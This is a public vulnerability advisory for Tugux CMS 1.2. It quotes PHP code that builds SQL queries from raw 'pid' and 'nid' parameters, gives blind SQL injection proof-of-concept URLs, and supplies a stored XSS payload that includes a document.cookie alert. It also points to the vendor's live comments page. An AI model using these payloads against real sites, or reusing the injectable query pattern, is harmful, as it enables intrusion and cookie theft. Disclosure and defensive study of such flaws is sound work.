Tugux CMS 1.2 Cross Site Scripting / Blind SQL Injection

2011-07-11T00:00:00
ID PACKETSTORM:102961
Type packetstorm
Reporter eidelweiss
Modified 2011-07-11T00:00:00

Description

                                        
                                            `===================================================================  
Tugux CMS 1.2 Multiple vulnerability (BLIND sql & xss)  
===================================================================  
  
Software: Tugux CMS  
Vendor: www.tugux.com  
Vuln Type: BLind SQL Injection  
Download link: http://www.tugux.com/uploads/47/tugux_cms.rar  
Author: eidelweiss  
contact: admin[at]eidelweiss[dot]info  
Home: www.eidelweiss.info  
  
  
References: http://eidelweiss-advisories.blogspot.com/2011/07/tugux-cms-12-multiple-vulnerability.html  
  
===================================================================  
Vuln c0de on page_text.php  
  
<?php   
  
session_start();  
require_once "scripts/connect_to_mysql.php";  
  
  
if (isset($_GET['pid'])){  
$pageid=$_GET['pid'];  
//------------------------------------------------  
$sqlCommand="SELECT lastmodified FROM pages WHERE id='$pageid' LIMIT 1";  
$query=mysqli_query($myConnection, $sqlCommand) or die (mysqli_error());  
while($row=mysqli_fetch_array($query)) {  
$date = $row["lastmodified"];  
}  
mysqli_free_result($query);  
  
//------------------------------------------------  
//------------------------------------------------  
$sqlCommand = "SELECT admin FROM pages WHERE showing='1' AND id='$pageid' LIMIT 1";  
$query = mysqli_query($myConnection, $sqlCommand) or die (mysqli_error());  
while($row = mysqli_fetch_array($query)){  
$admin = $row["admin"];  
}  
mysqli_free_result($query);  
//------------------------------------------------  
//------------------------------------------------  
$sqlCommand = "SELECT pagebody FROM pages WHERE showing='1' AND id='$pageid' LIMIT 1";  
$query = mysqli_query($myConnection, $sqlCommand) or die (mysqli_error());  
while($row = mysqli_fetch_array($query)){  
$body = $row["pagebody"];  
}  
mysqli_free_result($query);  
}  
//------------------------------------------------  
if (isset($_GET['nid'])){  
$nid=$_GET['nid'];  
$sql=mysqli_query($myConnection,"SELECT title, date, admin, news FROM news WHERE id='$nid'") or die (mysqli_error($myConnection));  
  
  
===================================================================  
  
exploit & p0c  
  
[!] page_text.php?nid=[valid nid]  
[!] page_text.php?pid=[valid pid]  
  
Example p0c  
  
[!] http://server/page_text.php?nid=12 <= True  
[!] http://server/page_text.php?nid=-12 <= False  
  
[!] http://server/page_text.php?pid=51 <= True  
[!] http://server/page_text.php?pid=-51 <= False  
  
  
[+] http://server:3306 <= download the file , save and open with c++ or wordpad will show mysql version  
  
[!] sample: http://server:3306 result : 5.0.92-community (use versi 5.0.92) :D  
  
===================================================================  
  
Software: Tugux CMS  
Vendor: www.tugux.com  
Vuln Type: xss  
Download link: http://www.tugux.com/uploads/47/tugux_cms.rar  
Author: eidelweiss  
contact: admin[at]eidelweiss[dot]info  
Home: www.eidelweiss.info  
  
====================================================================  
  
comments.php file is persistant to xss attack  
  
Go to   
  
http://server/comments.php  
  
and put or type this xss c0de into the command box  
  
';alert(String.fromCharCode(88,83,83,32,65,84,65,67,75,32,66,89,32,69,73,68,69,76,87,69,73,83,83))//\';alert(String.fromCharCode(88,83,83,32,65,84,65,67,75,32,66,89,32,69,73,68,69,76,87,69,73,83,83))//";alert(String.fromCharCode(88,83,83,32,65,84,65,67,75,32,66,89,32,69,73,68,69,76,87,69,73,83,83))//\";alert(String.fromCharCode(88,83,83,32,65,84,65,67,75,32,66,89,32,69,73,68,69,76,87,69,73,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83,32,65,84,65,67,75,32,66,89,32,69,73,68,69,76,87,69,73,83,83))</SCRIPT><script>alert(document.cookie)</script>  
  
then the site will direct you to  
  
http://server/latest.php?nid=  
  
and there you go.. xss will pop up  
  
p0c:  
http://server/comments.php  
or  
http://server/path/comments.php  
  
official site: http://www.tugux.com/comments.php  
  
Gratz:  
  
- YOGYACARDERLINK , DEVILZC0DE , etc  
- Nofia Fitri (unyu²), whitehat, note, petimati, psycothic_girl, viska agasi (dudutzkuw), wenkhairu, etc (capek aja di ketik semua)  
  
====================================================================  
  
Nothing Impossible In This World Even Nobody`s Perfect  
  
Hacking is Art  
  
===================================================================  
  
==========================| -=[ E0F ]=- |==========================  
`